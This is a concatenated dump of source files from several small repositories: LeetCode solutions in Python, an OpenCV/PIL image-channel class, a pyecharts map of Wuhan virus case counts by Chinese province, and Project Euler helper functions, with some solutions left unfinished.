:rtype: List[str]
"""
rowdict = {}
for c in "qwertyuiopQWERTYUIOP":
rowdict[c] = 1
for c in "asdfghjklASDFGHJKL":
rowdict[c] = 2
for c in "zxcvbnmZXCVBNM":
rowdict[c] = 3
res = []
for word in words:
if len(set(rowdict[c] for c in word)) == 1:
res.append(word)
return res
# @lc code=end
```
#### File: leetcode/Python3/503.next-greater-element-ii.py
```python
class Solution:
def nextGreaterElements(self, nums: List[int]) -> List[int]:
records = []
l = len(nums)
res = [-1] * l
for i in range(l * 2):
i = i % l
while records and nums[records[-1]] < nums[i]:
res[records.pop()] = nums[i]
records.append(i)
return res
# @lc code=end
```
#### File: leetcode/Python3/513.find-bottom-left-tree-value.py
```python
class Solution:
def findBottomLeftValue(self, root: TreeNode) -> int:
self.ans = [None, float('inf'), float('-inf')]
self.finder(root, 0, 0)
return self.ans[0]
def finder(self, root, x, y):
if not root:
return
if y > self.ans[2]:
self.ans = [root.val, x, y]
elif y == self.ans[2]:
if x < self.ans[1]:
self.ans = [root.val, x, y]
self.finder(root.left, x - 1, y + 1)
self.finder(root.right, x + 1, y + 1)
# @lc code=end
```
#### File: leetcode/Python3/532.k-diff-pairs-in-an-array.py
```python
import collections
class Solution:
def findPairs(self, nums, k):
if k == 0:
counter = collections.Counter(nums)
ans = 0
for k in counter:
if counter[k] > 1:
ans += 1
return ans
nums = list(set(nums))
nums.sort()
ans = 0
i = 0
j = 1
while i < j and j < len(nums):
if nums[j] - nums[i] < k:
j += 1
elif nums[j] - nums[i] > k:
i += 1
if i == j:
j += 1
else:
if nums[j] - nums[i] == k:
ans += 1
i += 1
j += 1
return ans
if __name__ == '__main__':
a = Solution()
b = a.findPairs([1, 2, 3, 4, 5], k = 1)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/536.construct-binary-tree-from-string.py
```python
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def str2tree(self, s: str) -> TreeNode:
if not s:
return None
stack,number=[],''
for c in s:
if c in '()':
if c=='(' and number:
stack.append(TreeNode(number))
number=''
elif c==')':
if number:
node,parent=TreeNode(number),stack[-1]
number=''
else:
node,parent=stack.pop(),stack[-1]
if parent.left:
parent.right=node
else:
parent.left=node
else:
number+=c
if number:
stack=[TreeNode(number)]
return stack[0]
# @lc code=end
```
#### File: leetcode/Python3/543.diameter-of-binary-tree.py
```python
class Solution:
def diameterOfBinaryTree(self, root):
self.ans = 0
self.pathfinder(root)
return self.ans
def pathfinder(self, root):
if root is None:
return 0
lh = self.pathfinder(root.left)
rh = self.pathfinder(root.right)
self.ans = max(self.ans, lh + rh)
return max(lh, rh) + 1
# @lc code=end
```
#### File: leetcode/Python3/56.merge-intervals.py
```python
class Solution:
def merge(self, intervals):
if intervals == []:
return []
self.ans = []
intervals.sort()
self.helper(intervals[0][0], intervals[0][1], 0, intervals)
return self.ans
def helper(self, start, end, index, intervals):
for i in range(index, len(intervals)):
if intervals[i][0] > end:
self.ans.append([start, end])
return self.helper(intervals[i][0], intervals[i][1], i, intervals)
else:
start = min(start, intervals[i][0])
end = max(end, intervals[i][1])
self.ans.append([start, end])
# @lc code=end
```
#### File: leetcode/Python3/572.subtree-of-another-tree.py
```python
class Solution:
def isSubtree(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return self.compare(s, t) or self.isSubtree(s.left, t) or self.isSubtree(s.right, t)
def compare(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return s.val == t.val and self.compare(s.right, t.right) and self.compare(s.left, t.left)
# @lc code=end
```
#### File: leetcode/Python3/57.insert-interval.py
```python
class Solution:
def insert(self, intervals, newInterval):
"""
:type intervals: List[Interval]
:type newInterval: Interval
:rtype: List[Interval]
"""
start = newInterval[0]
end = newInterval[1]
left, right = [], []
for interval in intervals:
if start > interval[1]:
left.append(interval)
elif end < interval[0]:
right.append(interval)
else:
start = min(start, interval[0])
end = max(end, interval[1])
return left + [[start, end]] + right
# @lc code=end
```
#### File: leetcode/Python3/582.kill-process.py
```python
import collections
# @lc code=start
class Solution:
def killProcess(self, pid: List[int], ppid: List[int], kill: int):
children = collections.defaultdict(list)
for i in range(len(pid)):
children[ppid[i]].append(pid[i])
todo_ls = []
todo_ls.append(kill)
ans = []
while todo_ls:
temp_saver = []
while todo_ls:
curval = todo_ls.pop()
if curval in children:
temp_saver += children[curval]
ans.append(curval)
todo_ls = temp_saver
return ans
# @lc code=end
```
#### File: leetcode/Python3/599.minimum-index-sum-of-two-lists.py
```python
class Solution:
def findRestaurant(self, list1, list2):
if not list1 or not list2:
return []
both_like = set()
d = dict()
for i in range(len(list1)):
d[list1[i]] = i
for j in range(len(list2)):
if list2[j] in d:
both_like.add(list2[j])
d[list2[j]] += j
if not both_like:
return []
indexes = [val for key, val in d.items() if key in both_like]
mi_index = min(indexes)
answer = []
for key, val in d.items():
if val == mi_index and key in both_like:
answer.append(key)
return answer
if __name__ == '__main__':
a = Solution()
b = a.findRestaurant(["Shogun", "Tapioca Express", "Burger King", "KFC"],["Piatti", "The Grill at Torrey Pines", "Hungry Hunter Steakhouse", "Shogun"])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/5.longest-palindromic-substring.py
```python
class Solution:
def longestPalindrome(self, s: str) -> str:
if len(s) <= 1000:
res = ''
if len(s) == 1:
return s[0]
for i in range(len(s)):
res1 = anchor(i,i,s)
res2 = anchor(i,i+1,s)
if len(res1) > len(res):
res = res1
if len(res2) > len(res):
res = res2
return res
def anchor(start, end, string):
l= len(string)
while start >= 0 and end < l and string[start] == string[end]:
start = start - 1
end = end + 1
return string[start + 1: end]
# @lc code=end
```
#### File: leetcode/Python3/632.smallest-range-covering-elements-from-k-lists.py
```python
class Solution:
def smallestRange(self, nums: List[List[int]]) -> List[int]:
# @lc code=end
```
#### File: leetcode/Python3/63.unique-paths-ii.py
```python
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid):
if obstacleGrid[0][0] == 1:
return 0
if len(obstacleGrid) == 1:
for item in obstacleGrid[0]:
if item == 1:
return 0
return 1
if len(obstacleGrid) == 1:
for item in obstacleGrid:
if item == [1]:
return 0
return 1
n = len(obstacleGrid)
m = len(obstacleGrid[0])
mat = [[0] * m for _ in range(n)]
mat[0][0] = 1
for i in range(1, m):
if obstacleGrid[0][i] == 1:
break
else:
mat[0][i] = mat[0][i-1]
for j in range(1, n):
if obstacleGrid[j][0] == 1:
break
else:
mat[j][0] = mat[j - 1][0]
for i in range(1, m):
for j in range(1, n):
if obstacleGrid[j][i] == 0:
mat[j][i] = mat[j-1][i] + mat[j][i-1]
else:
mat[j][i] == 0
return mat[n-1][m-1]
# @lc code=end
```
#### File: leetcode/Python3/645.set-mismatch.py
```python
import collections
class Solution:
def findErrorNums(self, nums: List[int]) -> List[int]:
ans = []
d = collections.Counter(nums)
for k, v in d.items():
if v == 2:
ans.append(k)
break
num_set = set(nums)
full = {i for i in range(1, len(nums) + 1)}
ans += list(full - num_set)
return ans
# @lc code=end
```
#### File: leetcode/Python3/647.palindromic-substrings.py
```python
class Solution:
# Q: what is your def of a palindromic string? Would you give me a few more example?
# Q: You just want the number of valid substring or you want me to return or yield all the valid strings?
# Q: edge case: what should we return if the given string is empty, or no palindromic substring in the given string? None or 0?
# version 1: the way that is slow but straight and it works.
# def countSubstrings(self, s):
# """
# main function
# :type s: String
# :rtype: Int, number of valid substrings.
# """
# ans = 0
# for i in range(len(s)):
# p1 = i
# p2 = i
# while p2 >= 0 and p1 < len(s):
# if s[p1] == s[p2]:
# ans += 1
# p1 += 1
# p2 -= 1
# else:
# break
# p3 = i
# p4 = i - 1
# while p4 >= 0 and p3 < len(s):
# if s[p3] == s[p4]:
# ans += 1
# p3 += 1
# p4 -= 1
# else:
# break
# # time comp: O(n^2)
# return ans
# version 2
def countSubstrings(self, s):
"""
main function
:type s: String
:rtype: Int, number of valid substrings.
"""
s = "~#" + '#'.join(s) + '#!'
# dp: record the longest palindromic string radius in the current position
dp = [0] * len(s)
center = right = 0
for i in range(1, len(s) - 1):
if i < right:
dp[i] = min(right - i, dp[2 * center - i])
while s[i + dp[i] + 1] == s[i - dp[i] - 1]:
dp[i] += 1
if i + dp[i] > right:
center = i
right = dp[i] + i
return sum((l + 1)//2 for l in dp)
# a = Solution()
# b = a.countSubstrings("aaa")
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/659.split-array-into-consecutive-subsequences.py
```python
import collections
import heapq
class Solution:
def isPossible(self, nums):
lists = collections.defaultdict(list)
for num in nums:
prelens = lists[num - 1]
if not prelens:
prelen = 0
else:
prelen = heapq.heappop(prelens)
cur = lists[num]
heapq.heappush(cur,prelen + 1)
lists[num] = cur
for values in lists.values():
for v in values:
if v < 3:
return False
return True
# if __name__ == '__main__':
# a = Solution()
# b = a.isPossible([1,2,3,4,4,5])
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/678.valid-parenthesis-string.py
```python
class Solution:
def checkValidString(self, s):
left = 0
right = 0
for item in s:
if item == '(' or item =='*':
left += 1
else:
left -= 1
if left < 0:
return False
if left == 0:
return True
for i in range(len(s) - 1, -1, -1):
if s[i] == ')' or s[i] == '*':
right += 1
else:
right -= 1
if right < 0:
return False
return True
# @lc code=end
```
#### File: leetcode/Python3/687.longest-univalue-path.py
```python
from collections import deque
def construct_tree(values):
if not values:
return None
root = TreeNode(values[0])
queue = deque([root])
leng = len(values)
nums = 1
while nums < leng:
node = queue.popleft()
if node:
node.left = TreeNode(values[nums]) if values[nums] else None
queue.append(node.left)
if nums + 1 < leng:
node.right = TreeNode(values[nums+1]) if values[nums+1] else None
queue.append(node.right)
nums += 1
nums += 1
return root
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def longestUnivaluePath(self, root):
if not root:
return 0
self.mx = 0
self.finder(root)
return self.mx
def finder(self,root):
if not root:
return 0
left = self.finder(root.left)
right = self.finder(root.right)
l = 0
r = 0
# do not use left += 1
if root.left and root.left.val == root.val:
l = left + 1
if root.right and root.right.val == root.val:
r = right + 1
self.mx = max(self.mx, l + r)
return max(l, r)
if __name__ == '__main__':
tree = construct_tree([5,4,5,1,1,5])
b = Solution()
c = b.longestUnivaluePath(tree)
print(c)
# @lc code=end
```
#### File: leetcode/Python3/696.count-binary-substrings.py
```python
class Solution:
def countBinarySubstrings(self, s):
"""
:type s: str
:rtype: int
"""
result = 0
prev_length = 0
cur_length = 1
for i in range(1, len(s)):
if (s[i] == s[i - 1]):
cur_length += 1
else:
prev_length = cur_length
cur_length = 1
if prev_length >= cur_length:
result += 1
return result
# @lc code=end
```
#### File: leetcode/Python3/708.insert-into-a-sorted-circular-linked-list.py
```python
class Solution:
def insert(self, head: 'Node', insertVal: int) -> 'Node':
cur = None
next_ = None
min_head = None
if not head:
head = Node(insertVal)
head.next = head
return head
cur = head
next_ = head.next
while cur.val <= next_.val:
cur = cur.next
next_ = next_.next
if cur == head:
break
min_head = next_
while next_.val < insertVal:
cur = next_
next_ = next_.next
if next_ == min_head:
break
cur.next = Node(insertVal)
cur = cur.next
cur.next = next_
return head
# @lc code=end
```
#### File: leetcode/Python3/713.subarray-product-less-than-k.py
```python
import collections
class Solution:
def numSubarrayProductLessThanK(self, nums, k):
if len(nums) == 1:
if nums[0] < k:
return 1
return 0
mult = 1
l = 0
r = 0
ans = 0
for r in range(len(nums)):
mult *= nums[r]
while l <= r and mult >= k:
mult //= nums[l]
l += 1
ans += r - l + 1
return ans
if __name__ == '__main__':
a = Solution()
b = a.numSubarrayProductLessThanK([10, 5, 2, 6], 100)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/732.my-calendar-iii.py
```python
class Node:
def __init__(self, start, end, count):
self.left = None
self.right = None
self.start = start
self.end = end
self.multi = count
class MyCalendarThree:
def __init__(self):
self.root = None
self.mx = 1
def tree_helper(self, root, start, end, currentheight):
if root is None:
return Node(start, end, currentheight)
if start >= root.end:
root.right = self.tree_helper(root.right, start, end, currentheight)
elif end <= root.start:
root.left = self.tree_helper(root.left, start, end, currentheight)
else:
rgs = sorted([root.start, root.end, start, end])
cur_l, cur_r = root.start, root.end
root.start, root.end = rgs[1], rgs[2]
root.left = self.tree_helper(root.left, rgs[0], rgs[1], currentheight if start < cur_l else root.multi)
root.right = self.tree_helper(root.right, rgs[2], rgs[3], currentheight if end > cur_r else root.multi)
root.multi += currentheight
self.mx = max(self.mx, root.multi)
return root
def book(self, start: int, end: int):
self.root = self.tree_helper(self.root, start, end, 1)
return self.mx
# Your MyCalendarThree object will be instantiated and called as such:
# obj = MyCalendarThree()
# param_1 = obj.book(start,end)
# @lc code=end
```
#### File: leetcode/Python3/741.cherry-pickup.py
```python
class Solution:
def cherryPickup(self, grid: List[List[int]]) -> int:
n = len(grid)
from functools import lru_cache
#max cherries from (x1, y1) to (0, 0) + (x2, y2) to (0, 0)
@lru_cache(None)
def dp(x1, y1, x2):
y2 = x1 + y1 - x2
if x1 < 0 or y1 < 0 or x2 < 0 or y2 < 0: return -1
if grid[x1][y1] < 0 or grid[x2][y2] < 0: return -1
if x1 == 0 and y1 == 0: return grid[x1][y1]
ans = max(dp(x1-1, y1, x2-1), dp(x1, y1-1, x2-1),
dp(x1-1, y1, x2), dp(x1, y1-1, x2))
if ans < 0: return -1
ans += grid[x1][y1]
if x1 != x2:
ans += grid[x2][y2]
return ans
return max(0, dp(n-1, n-1, n-1))
# @lc code=end
```
#### File: leetcode/Python3/742.closest-leaf-in-a-binary-tree.py
```python
# def tree_builder(values):
# if not values:
# return None
# root = TreeNode(values[0])
# queue = collections.deque([root])
# leng = len(values)
# nums = 1
# while nums < leng:
# node = queue.popleft()
# if node:
# node.left = TreeNode(values[nums]) if values[nums] else None
# queue.append(node.left)
# if nums + 1 < leng:
# node.right = TreeNode(values[nums+1]) if values[nums+1] else None
# queue.append(node.right)
# nums += 1
# nums += 1
# return root
# if __name__ == '__main__':
# a = Solution()
# tree = tree_builder([1,2,3,4, None, None, None, 5, None,6])
# b = a.findClosestLeaf(tree, 2)
# print(b)
class Solution(object):
def findClosestLeaf(self, root, k):
"""
:type root: TreeNode
:type k: int
:rtype: int
"""
parents = {}
leaves = []
self.knode = None
def traverse(root):
if root.val == k: self.knode = root
if not root.left and not root.right:
leaves.append(root)
return
for child in (root.left, root.right):
if not child: continue
traverse(child)
parents[child.val] = root
def findParents(node):
ans = [node.val]
while node.val in parents:
node = parents[node.val]
ans.append(node.val)
return ans
traverse(root)
kParents = findParents(self.knode)
ans, dist = None, 0x7FFFFFFF
for leaf in leaves:
leafParents = findParents(leaf)
cross = [n for n in leafParents if n in kParents][0]
ndist = leafParents.index(cross) + kParents.index(cross)
if ndist < dist:
dist = ndist
ans = leaf
return ans.val
# @lc code=end
```
#### File: leetcode/Python3/744.find-smallest-letter-greater-than-target.py
```python
import heapq
class Solution:
def nextGreatestLetter(self, letters, target):
curheap = []
heapq.heappush(letters, target)
for letter in letters:
heapq.heappush(curheap, letter)
head = heapq.heappop(curheap)
if head == target:
nxt = heapq.heappop(curheap)
while nxt == head and curheap:
nxt = heapq.heappop(curheap)
return nxt
tar = heapq.heappop(curheap)
while tar != target:
tar = heapq.heappop(curheap)
if not curheap:
return head
ans = heapq.heappop(curheap)
while ans == target and curheap:
ans = heapq.heappop(curheap)
if ans == target:
return head
return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.nextGreatestLetter(["c","f","j"], "g")
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/746.min-cost-climbing-stairs.py
```python
class Solution:
def minCostClimbingStairs(self, cost):
"""
:type cost: List[int]
:rtype: int
"""
N = len(cost)
cost.append(0)
dp = [0] * (N + 1)
dp[0] = cost[0]
dp[1] = cost[1]
for i in range(2, N + 1):
dp[i] = min(dp[i - 1], dp[i - 2]) + cost[i]
return dp[-1]
# @lc code=end
```
#### File: leetcode/Python3/779.k-th-symbol-in-grammar.py
```python
class Solution(object):
def kthGrammar(self, N, K):
"""
:type N: int
:type K: int
:rtype: int
"""
if N == 1: return 0
if K == 2: return 1
if K <= 1 << N - 2: return self.kthGrammar(N - 1, K)
K -= 1 << N - 2
return 1 - self.kthGrammar(N - 1, K)
# @lc code=end
```
#### File: leetcode/Python3/789.escape-the-ghosts.py
```python
class Solution:
def escapeGhosts(self, ghosts: List[List[int]], target: List[int]):
my_dist = abs(target[0]) + abs(target[1])
for ghost in ghosts:
curdist = abs(ghost[0] - target[0]) + abs(ghost[1] - target[1])
if curdist < my_dist:
return False
return True
# @lc code=end
```
#### File: leetcode/Python3/79.word-search.py
```python
class Solution:
def exist(self, board, word):
start = [None, None]
h = len(board)
l = len(board[0])
walked = [[0] * l for _ in range(h)]
for i in range(h):
for j in range(l):
if board[i][j] == word[0]:
start = [i, j]
walked[i][j] = 1
if self.helper(word[1:], board, walked, start):
return True
walked[i][j] = 0
return False
def helper(self, rest, board, walked, current_pos):
if len(rest) == 0:
return True
i = current_pos[0]
j = current_pos[1]
if i > 0 and board[i - 1][j] == rest[0] and walked[i - 1][j] == 0:
walked[i - 1][j] = 1
if self.helper(rest[1:], board, walked, [i - 1, j]):
return True
walked[i - 1][j] = 0
if i < len(board) - 1 and board[i + 1][j] == rest[0] and walked[i + 1][j] == 0:
walked[i + 1][j] = 1
if self.helper(rest[1:], board, walked, [i + 1, j]):
return True
walked[i + 1][j] = 0
if j > 0 and board[i][j - 1] == rest[0] and walked[i][j - 1] == 0:
walked[i][j - 1] = 1
if self.helper(rest[1:], board, walked, [i, j - 1]):
return True
walked[i][j - 1] = 0
if j < len(board[0]) - 1 and board[i][j + 1] == rest[0] and walked[i][j + 1] == 0:
walked[i][j + 1] = 1
if self.helper(rest[1:], board, walked, [i, j + 1]):
return True
walked[i][j + 1] = 0
return False
# @lc code=end
```
#### File: leetcode/Python3/809.expressive-words.py
```python
class Solution(object):
def expressiveWords(self, S, words):
"""
:type S: str
:type words: List[str]
:rtype: int
"""
if not S:
return 0
ans = 0
set_S = set(S)
S_list = []
pre_s, pre_index = S[0], 0
for i, s in enumerate(S):
if pre_s != s:
S_list.append(S[pre_index:i])
pre_s, pre_index = s, i
if i == len(S) - 1:
S_list.append(S[pre_index:])
for word in words:
if set(word) != set_S:
continue
word_list = []
pre_w, pre_index = word[0], 0
for i, w in enumerate(word):
if pre_w != w:
word_list.append(word[pre_index:i])
pre_w, pre_index = w, i
if i == len(word) - 1:
word_list.append(word[pre_index:])
if len(S_list) == len(word_list):
if all(S_list[i] == word_list[i] if len(S_list[i]) < 3 else len(S_list[i]) >= len(word_list[i]) for i in range(len(S_list))):
ans += 1
return ans
# @lc code=end
```
#### File: leetcode/Python3/811.subdomain-visit-count.py
```python
import collections
class Solution:
def subdomainVisits(self, cpdomains: List[str]) -> List[str]:
if not cpdomains:
return []
d = collections.defaultdict(int)
for item in cpdomains:
time, domain = item.split(' ')
time = int(time)
subdo = domain.split('.')
pointer = len(subdo) - 1
while pointer >= 0:
curstr = '.'.join(subdo[pointer:])
d[curstr] += time
pointer -= 1
ans = []
for key, val in d.items():
ans.append(str(val) + ' ' + key)
return ans
# @lc code=end
```
#### File: leetcode/Python3/82.remove-duplicates-from-sorted-list-ii.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def deleteDuplicates(self, head):
fakehead = pre = ListNode(0)
fakehead.next = head
while head and head.next:
if head.val == head.next.val:
while head and head.next and head.val == head.next.val:
head = head.next
head = head.next
pre.next = head
else:
head = head.next
pre = pre.next
return fakehead.next
# @lc code=end
```
#### File: leetcode/Python3/838.push-dominoes.py
```python
class Solution:
def pushDominoes(self, dominoes: str) -> str:
l = 0
ans = []
dominoes = 'L' + dominoes + 'R'
for r in range(1, len(dominoes)):
if dominoes[r] == '.':
continue
cnt = r - l - 1
if l > 0:
ans.append(dominoes[l])
if dominoes[l] == dominoes[r]:
ans.append(dominoes[l] * cnt)
elif dominoes[l] == 'L' and dominoes[r] == 'R':
ans.append('.' * cnt)
else:
ans.append('R' * (cnt // 2) + '.' * (cnt % 2) + 'L' * (cnt // 2))
l = r
return ''.join(ans)
if __name__ == '__main__':
a = Solution()
b = a.pushDominoes(".L.R...LR..L..")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/872.leaf-similar-trees.py
```python
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode):
if not root1 and not root2:
return True
if not root1 or not root2:
return False
t1 = []
t2 = []
self.get_leafs(root1, t1)
self.get_leafs(root2, t2)
return t1 == t2
def get_leafs(self, root, curset):
if not root.left and not root.right:
curset.append(root.val)
if root.left:
self.get_leafs(root.left, curset)
if root.right:
self.get_leafs(root.right, curset)
# @lc code=end
```
#### File: leetcode/Python3/938.range-sum-of-bst.py
```python
class Solution:
def rangeSumBST(self, root: TreeNode, L: int, R: int) -> int:
self.ans = 0
self.finder(root, L, R)
return self.ans
def finder(self, root, l, r):
if not root:
return
if l <= root.val <= r:
self.ans += root.val
if root.val >= r:
self.finder(root.left, l, r)
elif root.val <= l:
self.finder(root.right, l, r)
else:
self.finder(root.left, l, r)
self.finder(root.right, l, r)
# @lc code=end
```
#### File: leetcode/Python3/953.verifying-an-alien-dictionary.py
```python
class Solution(object):
def isAlienSorted(self, words, order):
"""
:type words: List[str]
:type order: str
:rtype: bool
"""
N = len(words)
d = {c : i for i, c in enumerate(order)}
for i in range(N - 1):
pre, after = words[i], words[i + 1]
if pre == after: continue
_len = min(len(pre), len(after))
for j in range(_len):
if d[pre[j]] < d[after[j]]:
break
elif d[pre[j]] > d[after[j]]:
return False
if len(pre) > len(after) and pre[:_len] == after:
return False
return True
# @lc code=end
```
#### File: leetcode/Python3/957.prison-cells-after-n-days.py
```python
class Solution(object):
def prisonAfterNDays(self, oldcells, N):
"""
:type cells: List[int]
:type N: int
:rtype: List[int]
"""
cells = copy.deepcopy(oldcells)
count = 0
N %= 14
if N == 0:
N = 14
while count < N:
newCell = [0] * 8
for i in range(1, 7):
if cells[i - 1] == cells[i + 1]:
newCell[i] = 1
else:
newCell[i] = 0
cells = newCell
count += 1
return cells
# @lc code=end
```
#### File: leetcode/Python3/96.unique-binary-search-trees.py
```python
class Solution:
def numTrees(self, n: int):
if n < 2:
return n
dp = [0] * n
# @lc code=end
```
#### File: leetcode/Python3/993.cousins-in-binary-tree.py
```python
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int):
pre = 0
curval = 0
self.x = x
self.y = y
self.xdetail = []
self.ydetail = []
self.finder(0, 0, root)
if not self.xdetail or not self.ydetail:
return False
if self.xdetail[0] == self.ydetail[0]:
return False
if self.xdetail[1] != self.ydetail[1]:
return False
return True
def finder(self, pre, level, node):
if not node:
return
if not self.xdetail or not self.ydetail:
if node.val == self.x:
self.xdetail = [pre, level]
elif node.val == self.y:
self.ydetail = [pre, level]
else:
self.finder(node.val, level + 1, node.left)
self.finder(node.val, level + 1, node.right)
# @lc code=end
```
#### File: leetcode/Python3/tree_generator.py
```python
import collections
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def tree_builder(values):
if not values:
return None
root = TreeNode(values[0])
queue = collections.deque([root])
leng = len(values)
nums = 1
while nums < leng:
node = queue.popleft()
if node:
node.left = TreeNode(values[nums]) if values[nums] else None
queue.append(node.left)
if nums + 1 < leng:
node.right = TreeNode(values[nums+1]) if values[nums+1] else None
queue.append(node.right)
nums += 1
nums += 1
return root
if __name__ == '__main__':
a = tree_builder([1,None,2,2])
print(a)
``` |
{
"source": "610yilingliu/simi_pic_detection",
"score": 3
} |
#### File: simi_pic_detection/pic_analyzer_python/image.py
```python
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import cv2
import os
class input_img(object):
def __init__(self, pic_path):
self.__path = pic_path
self.__image = Image.open(pic_path)
self.__rgb_np = np.array(self.__image)
self.__name = os.path.basename(pic_path)
self.__hsv = cv2.cvtColor(self.__rgb_np, cv2.COLOR_RGB2HSV)
self.__hsv_np = np.array(self.__hsv)
def get_name(self):
return self.__name
def get_image(self):
return self.__image
def getrgb_np(self):
return self.__rgb_np
def getpath(self):
return self.__path
def getRchannel(self):
rgb_np = self.__rgb_np
R = rgb_np[:,:,0]
return R
def getGchannel(self):
rgb_np = self.__rgb_np
G = rgb_np[:,:,1]
return G
def getBchannel(self):
rgb_np = self.__rgb_np
B = rgb_np[:,:,2]
return B
def gethsv(self):
return self.__hsv
def gethsv_np(self):
return self.__hsv_np
def getHchannel(self):
hsv_np = self.__hsv_np
return hsv_np[:,:,0]
def getSchannel(self):
hsv_np = self.__hsv_np
return hsv_np[:,:,1]
def getVchannel(self):
hsv_np = self.__hsv_np
return hsv_np[:,:,2]
def getgrayimage(self):
img = self.__rgb_np
gray_img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
out_img = cv2.cvtColor(gray_img, cv2.COLOR_GRAY2RGB)
return out_img
def getbwimages(self, thresholds = [40, 80, 120, 160, 200]):
gray_img = cv2.cvtColor(self.getgrayimage(), cv2.COLOR_RGB2GRAY)
bw_dic = dict()
for i in range(len(thresholds)):
bw = cv2.threshold(gray_img, thresholds[i], 255, cv2.THRESH_BINARY)[1]
bw_dic['bw' + str(i)] = cv2.cvtColor(bw, cv2.COLOR_GRAY2RGB)
return bw_dic
def showimg(image):
plt.imshow(image)
plt.show()
if __name__ == '__main__':
p = input_img('../pics/raw_1.jpg')
G = p.getGchannel()
B = p.getBchannel()
R = p.getSchannel()
showimg(R)
``` |
{
"source": "610yilingliu/WuhanVirus_analyze",
"score": 3
} |
#### File: 610yilingliu/WuhanVirus_analyze/analyze.py
```python
from pyecharts.charts import Map
from pyecharts import options as opts
import pandas as pd
import numpy as np
from math import log10
def standardlize(data, max, min):
if data != 0:
return log10(data)/log10(max-min)
return 0
en_to_zhcn = {
'Hubei': '湖北',
'Beijing': '北京',
'Guangdong': '广东',
'Shanghai': '上海',
'Zhejiang': '浙江',
'Yunnan': '云南',
'Sichuan': '四川',
'Shandong': '山东',
'Guangxi': '广西',
'Guizhou': '贵州',
'Anhui': '安徽',
'Hainan': '海南',
'Ningxia':'宁夏',
'Jilin':'吉林',
'Jiangxi':'江西',
'Tianjin':'天津',
'Henan':'河南',
'Chongqing': '重庆',
'Shanxi': '山西',
'Heilongjiang': '黑龙江',
'Hunan': '湖南',
'Liaoning':'辽宁',
'Macau':'澳门',
'Taiwan':'台湾',
'Fujian':'福建',
'Hongkong':'香港',
'Hebei': '河北',
'Inner Mongolia': '内蒙古',
'Jiangsu': '江苏',
'Shaanxi': '陕西',
'Xinjiang': '新疆',
'Gansu': '甘肃',
'Qinghai': '青海',
'Tibet':'西藏',
}
virus_data = pd.read_csv('virus_data_1.26.csv')
# Translate to Chinese
virus_data['Region_zhcn'] = virus_data['Region']
for i in range(len(virus_data)):
virus_data['Region_zhcn'].replace(en_to_zhcn, inplace = True)
name = list(virus_data['Region_zhcn'])
infected_data = list(virus_data['Infected'])
standardlized = []
for i in range(len(infected_data)):
standardlized.append(standardlize(infected_data[i], max(infected_data), min(infected_data)))
mapping = [[name[i], standardlized[i]] for i in range(len(name))]
infected_map = Map()
infected_map.set_series_opts(
label_opts=opts.LabelOpts(is_show=False),
)
infected_map.set_global_opts(
title_opts=opts.TitleOpts(title="People infected from Wuhan Virus"),
visualmap_opts=opts.VisualMapOpts(
is_show = False,
max_= max(standardlized),
range_text=["max", "min"],
range_size= 1
),
legend_opts=opts.LegendOpts(is_show = False),
)
infected_map.add(" ", mapping, maptype = "china")
infected_map.render_notebook()
infected_map.render('map.html')
``` |
{
"source": "6112/project-euler",
"score": 4
} |
#### File: project-euler/helpers/sequence.py
```python
def permutations (tokens):
"""Used as an iterator for all the permutations of a sequence."""
if not tokens:
yield []
return
encountered = set ()
for index, first in enumerate (tokens):
if first not in encountered:
rest = tokens [: index] + tokens [index + 1:]
encountered.add(first)
for permutation in permutations (rest):
yield [first] + permutation
def n_permutations(tokens, n):
"""Used as an iterator for all n-permutations of a sequence."""
if not tokens:
yield []
return
if n == 0:
yield []
return
encountered = set()
for index, first in enumerate(tokens):
if first not in encountered:
rest = tokens[: index] + tokens[index + 1 :]
encountered.add(first)
for perm in n_permutations(rest, n - 1):
yield [first] + perm
def take_n(tokens, n):
"""Used as an iterator for all possible combinations of n elements from
tokens."""
if not tokens:
yield []
return
if n == 0:
yield []
return
encountered = set()
for index, first in enumerate(tokens):
if first not in encountered:
rest = tokens[index + 1 :]
encountered.add(first)
if n == 1:
yield [first]
else:
for perm in take_n(rest, n - 1):
if perm:
yield [first] + perm
def is_permutation(xs, ys):
"""Returns True iff the two lists are permutations of eachother."""
return sorted(xs) == sorted(ys)
def left_truncations (tokens):
"""Used as an iterator for all truncations of a sequence, from the left.
For instance, left_truncations('123') yields '123', '12', and '1'."""
while tokens:
yield tokens
tokens = tokens [: -1]
def right_truncations (tokens):
"""Used as an iterator for all truncations of a sequence, from the right.
For instance, right_truncations('123' yields '123', '23', and '3'."""
while tokens:
yield tokens
tokens = tokens [1 :]
def rotate (tokens):
"""Returns a rotated sequence from the given sequence. All elements are
moved one position to the right, and the last element is placed at the
beginning."""
return tokens [-1 :] + tokens [: -1]
def rotations (tokens):
"""Used as an iterator for all rotations of a sequence, as per the rotate()
function."""
rotation = tokens
for iterator in range (len (tokens)):
yield rotation
rotation = rotate (rotation)
```
#### File: project-euler/problems/013.py
```python
import helpers.file as fileutils
def euler():
# read the file
numbers = fileutils.flattened_list_from_file('data/013.txt')
# return the first ten digits of the sum of the numbers
return str(sum(numbers)) [:10]
```
#### File: project-euler/problems/015.py
```python
GRID_SIZE = 21
def euler():
# construct the 21x21 grid, whose elements are the number of possible paths
# to reach that cell
